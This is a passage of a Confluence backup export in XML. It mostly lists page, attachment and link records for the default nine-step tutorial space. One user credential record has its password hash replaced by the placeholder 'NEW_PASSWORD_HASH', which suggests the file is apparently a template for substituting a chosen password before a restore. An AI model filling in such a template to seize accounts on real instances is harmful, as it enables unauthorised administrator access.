<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196654</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196655</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196656</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196657</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196658</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262149</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262152</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:51.989</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<collection name="attachments" class="java.util.Collection"><element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98341</id>
|
||||
</element>
|
||||
<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98351</id>
|
||||
</element>
|
||||
<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98354</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position">4</property>
|
||||
<property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98343</id>
|
||||
<property name="hibernateVersion">18</property>
|
||||
<property name="title"><![CDATA[step09-01.png]]></property>
|
||||
<property name="lowerTitle"><![CDATA[step09-01.png]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262246</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262247</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262248</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262265</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">3</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98306</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98331</id>
|
||||
<property name="hibernateVersion">10</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262189</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.025</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98344</id>
|
||||
<property name="hibernateVersion">17</property>
|
||||
<property name="title"><![CDATA[Step8-01.png]]></property>
|
||||
<property name="lowerTitle"><![CDATA[step8-01.png]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262227</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262228</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262258</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262259</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">2</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98305</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98336</id>
|
||||
<property name="hibernateVersion">10</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262188</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.030</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98335</id>
|
||||
<property name="hibernateVersion">12</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262195</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.033</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98337</id>
|
||||
<property name="hibernateVersion">17</property>
|
||||
<property name="title"><![CDATA[prev.jpg]]></property>
|
||||
<property name="lowerTitle"><![CDATA[prev.jpg]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262236</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262249</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262250</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98338</id>
|
||||
<property name="hibernateVersion">18</property>
|
||||
<property name="title"><![CDATA[welcome.png]]></property>
|
||||
<property name="lowerTitle"><![CDATA[welcome.png]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262235</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262238</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262262</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98314</id>
|
||||
<property name="hibernateVersion">37</property>
|
||||
<property name="title"><![CDATA[Learn the wonders of autoconvert (step 7 of 9)]]></property>
|
||||
<property name="lowerTitle"><![CDATA[learn the wonders of autoconvert (step 7 of 9)]]></property>
|
||||
<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163844</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196609</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196610</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196611</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196612</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196613</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196644</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262150</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262167</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262185</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.044</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position">6</property>
|
||||
<property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="InternalUserCredentialRecord" package="com.atlassian.crowd.model.user">
|
||||
<id name="id">524289</id>
|
||||
<property name="user" class="InternalUser" package="com.atlassian.crowd.model.user"><id name="id">491521</id>
|
||||
</property>
|
||||
<property name="passwordHash"><![CDATA[NEW_PASSWORD_HASH]]></property>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98313</id>
|
||||
<property name="hibernateVersion">13</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262191</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.049</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98312</id>
|
||||
<property name="hibernateVersion">14</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262193</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.053</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98311</id>
|
||||
<property name="hibernateVersion">16</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262177</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.056</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98318</id>
|
||||
<property name="hibernateVersion">42</property>
|
||||
<property name="title"><![CDATA[Prettify the page with an image (step 4 of 9)]]></property>
|
||||
<property name="lowerTitle"><![CDATA[prettify the page with an image (step 4 of 9)]]></property>
|
||||
<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163850</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196627</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196629</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196631</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196632</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262160</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262162</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.061</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<collection name="attachments" class="java.util.Collection"><element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98342</id>
|
||||
</element>
|
||||
<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98346</id>
|
||||
</element>
|
||||
<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98350</id>
|
||||
</element>
|
||||
<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98352</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position">3</property>
|
||||
<property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98317</id>
|
||||
<property name="hibernateVersion">28</property>
|
||||
<property name="title"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="lowerTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
|
||||
<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163841</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196616</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196639</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196642</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196643</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262154</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.065</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<collection name="attachments" class="java.util.Collection"><element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98337</id>
|
||||
</element>
|
||||
<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98345</id>
|
||||
</element>
|
||||
<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98347</id>
|
||||
</element>
|
||||
<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98349</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position">2</property>
|
||||
<property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98316</id>
|
||||
<property name="hibernateVersion">16</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262173</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.071</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98315</id>
|
||||
<property name="hibernateVersion">5</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262159</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.074</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98322</id>
|
||||
<property name="hibernateVersion">53</property>
|
||||
<property name="title"><![CDATA[A quick look at the editor (step 2 of 9)]]></property>
|
||||
<property name="lowerTitle"><![CDATA[a quick look at the editor (step 2 of 9)]]></property>
|
||||
<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163849</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196650</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196651</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196652</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196653</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262166</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262182</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.078</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<collection name="attachments" class="java.util.Collection"><element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98339</id>
|
||||
</element>
|
||||
<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98355</id>
|
||||
</element>
|
||||
<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98356</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position">1</property>
|
||||
<property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98321</id>
|
||||
<property name="hibernateVersion">38</property>
|
||||
<property name="title"><![CDATA[Lay out your page (step 6 of 9)]]></property>
|
||||
<property name="lowerTitle"><![CDATA[lay out your page (step 6 of 9)]]></property>
|
||||
<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163848</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196628</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196633</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196634</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196635</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196636</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262153</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262156</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.083</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<collection name="attachments" class="java.util.Collection"><element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98340</id>
|
||||
</element>
|
||||
<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98348</id>
|
||||
</element>
|
||||
<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98353</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position">5</property>
|
||||
<property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98320</id>
|
||||
<property name="hibernateVersion">24</property>
|
||||
<property name="title"><![CDATA[What is Confluence? (step 1 of 9)]]></property>
|
||||
<property name="lowerTitle"><![CDATA[what is confluence? (step 1 of 9)]]></property>
|
||||
<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163843</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196621</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196625</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196630</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262155</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.086</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position">0</property>
|
||||
<property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98319</id>
|
||||
<property name="hibernateVersion">30</property>
|
||||
<property name="title"><![CDATA[Welcome to Confluence]]></property>
|
||||
<property name="lowerTitle"><![CDATA[welcome to confluence]]></property>
|
||||
<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163842</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196624</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196637</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196638</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196640</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196641</id>
|
